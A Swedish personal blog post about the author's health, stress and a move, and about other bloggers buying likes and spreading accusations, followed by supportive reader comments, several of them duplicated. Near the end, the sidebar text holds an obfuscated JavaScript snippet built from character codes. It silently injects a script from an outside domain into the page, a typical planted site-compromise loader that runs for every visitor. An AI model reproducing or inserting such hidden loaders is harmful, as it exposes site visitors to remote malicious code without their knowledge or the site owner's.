bittra bloggare, falska anklagelser, köpta likes och inbördes beundran!

FullSizeRender 58

Hej Fina du!

Förlåt, förlåt, förlåt….  för dåligt med uppdateringar.

jag mår inte bra. Inte bra als faktiskt. Stressad, lite överbokad, lite mycket på alla plan. MEN nu har jag sett över det och ställt in ALLT som var inbokat. Julfester, event, små jobb osv… Istället kommer jag stanna här nere på Öland tills årsskiftet (bortsett julafton möjligtvis ) Jag kommer fokusera på Lilleman, butiken, träning, sömn och vila. Just nu ligger jag i sängen på Hotel Skansen där vi tillfälligt bor… 

Jag har varit hos doktorn, gjort hälsoundersökningar och lämnat prover osv. Jag är inte döende, så farligt är det inte 😉 Men jag har en kraftig kemisk obalans i kroppen. Så det ska jag ändra på nu 😉

Jag har sedan Thailand legat i 40 graders feber flera dagar. Därför ville jag dubbelkolla att det inte var något super allvarligt, vilket det inte var.

Men jag behöver se över min kost, utesluta mjölkprodukter under en period (satan i gatan där rök mjölken i kaffet !! ) och se till att få ordning på dom värdena som inte riktigt är som dom ska. Tröttheten kommer ifrån järnbrist, inget mer avancerat än så… Poängen är bara att jag helt enkelt inte är på topp just nu och att jag därför inte uppdaterat så mycket, för att jag nätt och jämt hinner med det jag måste just nu.

Idag har jag och min kollega Vickan lagt fyra timmar i min gamla lägenhet, vi är snart klara. Vi kommer börja där imorgon bitti innan vi åker tillbaka till butiken, för att bli klara med det sista. FY FAN vad det tar på krafterna att flytta!!!

-Tack Vickan för att du är du <3

Nu ikväll så hade jag ett möte med en vän/kollega sedan tio år Malin. (läs hennes blog här ) Jag och Malin har några spännande projekt på G framöver….  Här ser ni en utav Malins bilder Underbara vackra Helleborus och tak-lök.

-Trendigt, snyggt och enkelt! 

IMG_1445

Från blommor, och min tillfälliga svacka vad det gäller hälsan….

Here we go again! 

När mina ”kollegor” är falska och skjuter sig själva i foten  ( läs HÄR )

Ett enkelt, konkret och bra inlägg enligt mig! Jag vet såklart VEM Madde syftar på, då vi diskuterat detta på telefonen.  En rar, ung, ganska oerfaren tjej, som inte riktigt fattar grejen med att bygga upp någonting sakta men säkert OCH på riktigt. Vilket hon med tiden kommer att förstå med tanke på konsekvenserna det drar med sig för hennes del.  

Hon är dessvärre inte ensam om just detta. Saken är den att alla vi som jobbar seriöst med våra bloggar, vet hur viktigt det är med korrekt statistik och siffror. Många yngre tjejer går från en dag till en annan från 0-140k på instagram och använder sedan dessa siffror i införsäljning mot samarbetspartner.

Det är helt upp till var och en hur man väljer att bygga upp sig varumärke, att köpa följare/likes, spökkommentera på sin egna blogg eller utge sig för att vara någon man inte är. -Enligt mig INTE okay! 

 MEN som vanligt så blir jag påhoppad när sådana här ämnen kommer upp! Man insinuerar att det är MIG det handlar om, UTAN att skriva ut mitt namn (menar ej MADDE eller MIRKAs inlägg). 

Herre gud! Detta är vuxenmobbning på hög nivå!  Förebild för sina barn? Förebild för yngre bloggerskor? Bra varumärke för sina samarbetspartner? -inte direkt!

Vuxenmobbning, inbördes beundran, bull-shitare och intrigmakerskor!!! Det existerar inte i min värld eller i mitt umgänge! 

Jag kan i min vildaste fantasi inte förstå hur man orkar lägga så mycket energi på mig istället för sig själv?!

-Heeeeeelt galet!

Jag har en enda gång hängt ut någon vid namn i bloggen och satt ner foten och sagt ifrån! Då berättade jag om verkliga upplevelser, alltså inget bluff och båg.  

-Hur vet jag då allt detta? Jo, för att mina läsare uppdaterar mig om detta, på mitt kommentarsfält, på min fb och i min mail inbox…  

Men vet ni, jag driver TRE företag, jobbar med en bok, är mitt i en flytt, julruschen i butiken är i full gång, samtidigt som projekten avlöser varandra och jag försöker att fokusera på träningen och hälsan. OCH viktigast av allt, jag är ensamstående mamma till Ludvig (lilleman) som alltid kommer i första hand.

Jag skulle aldrig få för mig att lägga en massa negativ energi på andra ”kollegor” inom branscherna jag jobbar inom, för att framstå som bättre själv! ( ologiskt i min värld )

 Än mindre lägga någon energi på någonting annat än det som kan få mig att må bra, utvecklas och ta mig framåt!!! Mitt grund motto rent generellt, alltså inte bara inom blogg-världen. Är att

”Sköt dig själv och skit i andra” 

 Jag står för vem jag är och det jag skriver. Jag har lovat er alla en ÄRLIG blogg och det är precis det ni får!

MEN framförallt jag väljer aktivt att stå över denna dagisnivå! Men behöver ännu en gång försvara mig trots att jag bara vill bli lämnad ifred… 

Detta verkar vara en neverending story. Men för min del sätter jag punkt nu och kommer fortsättningsvis inte att svara eller försvara mig.

Så jag ber dig som är in läsare att INTE uppdatera mig om skitsnack och falska anklagelser. Här inne ska vi ha en bra stämning! <3 

 

IMG_1450

Nä vet ni vad, ärlighet varar längst!

Nu ska jag ta min trötta och ganska slutkörda uppsyn och krypa ner under täcket för en välbehövlig skönhetssömn!

Kram & Gonatt <3

22 Komentarer

 1. Säger bara en sak! Bra rutet igen! Hoppas hoppas verkligen att du får lugn o ro nån jäkla gång. Och jag hoppas att fler vaknar upp och inser vad ”denna där” håller på med. Stor stor kram till dig My. Va rädd om dig.

 2. Säger bara en sak! Bra rutet igen! Hoppas hoppas verkligen att du får lugn o ro nån jäkla gång. Och jag hoppas att fler vaknar upp och inser vad ”denna där” håller på med. Stor stor kram till dig My. Va rädd om dig.

 3. Bra My! Bra ställningstagande. Blev själv väldigt trött på detta och skrev ett inlägg på min egen blogg i går kväll om just detta med köpta likes och så vidare…och egna erfarenheter av vissa!
  Att företagare skulle vara så naiva är skrattretande i min värld och säkert i din också!
  Jag lovar att hjälpa till med glada tillrop här inne. Du är en supertjej och det är ändå ingen som tror dom bittra och avundsjuka det lyser igenom så klart!
  Superfina arrangemang du lade ut i går. Inspirerande! Ta nu hand om dig och se till att äta ordentlig. Det är superviktigt med så mycket träning!
  Sköt om dig!
  //Berith

 4. Hej Älskade My!
  Jag tycker verkligen att du är en helt fantastisk människa som orkar med det
  tunga lass som du gör med bravur ensamstående mamma,egen företagare till 3 företag.Och är en helt underbar bloggerska som lever i verkligheten och inte i någon fantasi värld som vissa gör som bloggar, där det bara är fantastiskt allting finns inga problem över huvud taget lite synd om sådan människor kan jag tycka.Glöm inte att vi är många som älskar ditt bloggande och som stöder dig,ta väl hand om dig nu så du blir friskt och orkar fira Jul&Nyår med dina nära och kära många kramar från Ewa

 5. Bra My! Bra ställningstagande. Blev själv väldigt trött på detta och skrev ett inlägg på min egen blogg i går kväll om just detta med köpta likes och så vidare…och egna erfarenheter av vissa!
  Att företagare skulle vara så naiva är skrattretande i min värld och säkert i din också!

  Jag lovar att hjälpa till med glada tillrop här inne. Du är en supertjej och det är ändå ingen som tror dom bittra och avundsjuka det lyser igenom så klart!

  Superfina arrangemang du lade ut i går. Inspirerande! Ta nu hand om dig och se till att äta ordentlig. Det är superviktigt med så mycket träning!

  Sköt om dig!
  //Berith

 6. Hej Älskade My!
  Jag tycker verkligen att du är en helt fantastisk människa som orkar med det
  tunga lass som du gör med bravur ensamstående mamma,egen företagare till 3 företag.Och är en helt underbar bloggerska som lever i verkligheten och inte i någon fantasi värld som vissa gör som bloggar, där det bara är fantastiskt allting finns inga problem över huvud taget lite synd om sådan människor kan jag tycka.Glöm inte att vi är många som älskar ditt bloggande och som stöder dig,ta väl hand om dig nu så du blir friskt och orkar fira Jul&Nyår med dina nära och kära många kramar från Ewa

 7. Bra beslut att ställa in en del grejer nu när kroppen säger ifrån. Har läst din blogg ett tag nu och undrar hur du orkar med allt. Problemet är väl när allt är så kul och man vill vara med på allt. Försök boka in tomma dagar i din almanacka med jämna mellanrum där du inte får göra något, förutom att mysa med din lilleman. Visst förstår jag att livet som egenföretagare ser annorlunda ut än för oss ” vanliga” arbetare men var rädd om dig. Ha d gott.

 8. Bra sagt. Du är grymt duktig och gör ett kanonbra jobb.Fortsätt så.Försök att att inte bry dig om de som snackar skit. Ta nu hand om dig så att du snart känner dig bättre. Kram

 9. Bra beslut att ställa in en del grejer nu när kroppen säger ifrån. Har läst din blogg ett tag nu och undrar hur du orkar med allt. Problemet är väl när allt är så kul och man vill vara med på allt. Försök boka in tomma dagar i din almanacka med jämna mellanrum där du inte får göra något, förutom att mysa med din lilleman. Visst förstår jag att livet som egenföretagare ser annorlunda ut än för oss ” vanliga” arbetare men var rädd om dig. Ha d gott.

 10. Bra sagt. Du är grymt duktig och gör ett kanonbra jobb.Fortsätt så.Försök att att inte bry dig om de som snackar skit. Ta nu hand om dig så att du snart känner dig bättre. Kram

 11. Stå på dig! Jag tycker att du sprider en sund och hälsosam livsstil! Att man inte hinner med träning ibland och att man får dippar! Bloggar där allt är perfekt och tillrättalagt tror jag inte på. Sen är det väldigt mycket alkohol i en del bloggar ja faktiskt ibland flera gånger i veckan! Det tycker inte jag är okej om någon vill framstå som tränings- och renlevnadsmänniska. Fram för flera som dig vanliga My,krya på dig .

 12. Stå på dig! Jag tycker att du sprider en sund och hälsosam livsstil! Att man inte hinner med träning ibland och att man får dippar! Bloggar där allt är perfekt och tillrättalagt tror jag inte på. Sen är det väldigt mycket alkohol i en del bloggar ja faktiskt ibland flera gånger i veckan! Det tycker inte jag är okej om någon vill framstå som tränings- och renlevnadsmänniska. Fram för flera som dig vanliga My,krya på dig .

 13. Men kära My, du ÄR underbar… Det spelar ingen roll hur ofta du bloggar eller inte. Ta hand om dig o din älskade pojke. Önskar dig en riktigt God Jul. Skulle vara så kul att hälsa på dig i butiken någon gång. Massor kramar igen från maria e

 14. Men kära My, du ÄR underbar… Det spelar ingen roll hur ofta du bloggar eller inte. Ta hand om dig o din älskade pojke. Önskar dig en riktigt God Jul. Skulle vara så kul att hälsa på dig i butiken någon gång. Massor kramar igen från maria e

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/